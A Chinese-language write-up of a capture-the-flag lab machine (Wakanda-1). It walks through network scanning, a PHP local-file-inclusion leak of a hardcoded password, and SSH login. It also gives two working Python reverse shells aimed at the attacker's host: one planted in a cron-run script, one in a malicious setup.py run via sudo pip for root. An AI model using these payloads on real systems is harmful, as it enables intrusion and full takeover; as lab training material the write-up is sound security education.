首先我们从网站上下载靶机wakanda-1的ova文件安装(最好是在virtual box上,vm上安装较为麻烦),我的kali在vm上,于是把靶机和kali放在同一个网段就行了,我做的是把kali和wakanda桥接到同一个物理网卡上。
在kali上面探测一下内网存活的主机,这里有人喜欢用nmap,写个脚本自动ping,不过也可以用kali的工具netdiscover。
root@kali:~# netdiscover -i eth0
发现他的主机ip 192.168.0.137
探测一下端口开放情况:
root@kali:~# nmap -sS -p- 192.168.0.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 23:16 CST
Nmap scan report for Wakanda1 (192.168.0.137)
Host is up (0.00060s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3333/tcp open dec-notes
35322/tcp open unknown
MAC Address: 08:00:27:3C:1E:DB (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
root@kali:~#
3333端口其实是ssh端口,看到80端口开放,于是去访问一下网站
查看网站的源代码,有一行注释给出提示:
于是考虑到LFI漏洞利用,利用PHP协议构造payload得到index.php的源代码。
丢到burp的decode解码得到源代码:
<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it
if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}
?>
这里看到了一个密码,于是尝试ssh登陆服务器。之前看到有一个made by mamadou,作为用户名来登录。
root@kali:~# ssh mamadou@192.168.0.137 -p 3333
mamadou@192.168.0.137's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 10:29:35 2020 from kali
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$
得到的是一个python命令行,转成终端命令行,在mamadou的用户目录下看到flag1.txt
看一下/etc/passwd的内容,发现其他用户devops。
于是看看这个用户下面有什么文件能够被利用:
发现了两个可疑的文件,就是前两个.antivirus.py和/tmp/test,而且文件创建时间都很靠前,最主要是.antivirus.py给其他组用户提供了修改权限。看一看这个文件的内容
mamadou@Wakanda1:/srv$ cat .antivirus.py
open('/tmp/test','w').write('test')
结合时间很新,说明这个py在定时执行,那就自然而然想到改这个py获取devops权限。
还有一种发现方式是在发现/tmp/test这个文件后,执行命令
mamadou@Wakanda1:/$ grep -r '/tmp/test' / 2>/dev/null
Binary file proc/1284/task/1284/cmdline matches
Binary file proc/1284/cmdline matches
srv/.antivirus.py:open('/tmp/test','w').write('test')
usr/lib/python2.7/dist-packages/setuptools/tests/test_packageindex.py: url = 'file:///tmp/test_package_index'
Binary file usr/lib/python2.7/dist-packages/setuptools/tests/test_packageindex.pyc matches
这样也可以发现.antivirus.py。
在antivirus.py里面做一个反弹shell,kali侦听本地端口1234.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.186",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
root@kali:~# nc -nvvlp 1234
listening on [any] 1234 ...
connect to [192.168.0.137] from localhost [192.168.0.106] 60823
bash: cannot set terminal process group (1107): Inappropriate ioctl for device
bash: no job control in this shell
devops@Wakanda1:/$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
于是可以直接得到devops的shell,在devops的用户目录下得到flag2.txt。
sudo -l 发现有pip权限,于是做一个恶意安装文件,来获取root权限。
$ sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
这里借用别人写好的exp:
from setuptools import setup
from setuptools.command.install import install
import os,socket,subprocess
class CustomInstall(install):
def run(self):
install.run(self)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.186",14580))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
setup(name='FakePip',
version='0.0.1',
description='This will exploit a sudoer able to /usr/bin/pip install *',
url='https://github.com/werneror',
author='Werner',
author_email='me@werner.wiki',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
改一下IP和端口,反弹shell到kali。这里我实在kali上面写好,搭建简易的http服务器。
在靶机上下载文件后运行pip即可获得root权限
$ sudo pip install . --upgrade --force-reinstall
Unpacking /tmp/pip2
Running setup.py (path:/tmp/pip-CarpRr-build/setup.py) egg_info for package from file:///tmp/pip2
Installing collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
kali侦听14580端口:获取root权限 ,完成!!
做这个靶机有参考两篇文章: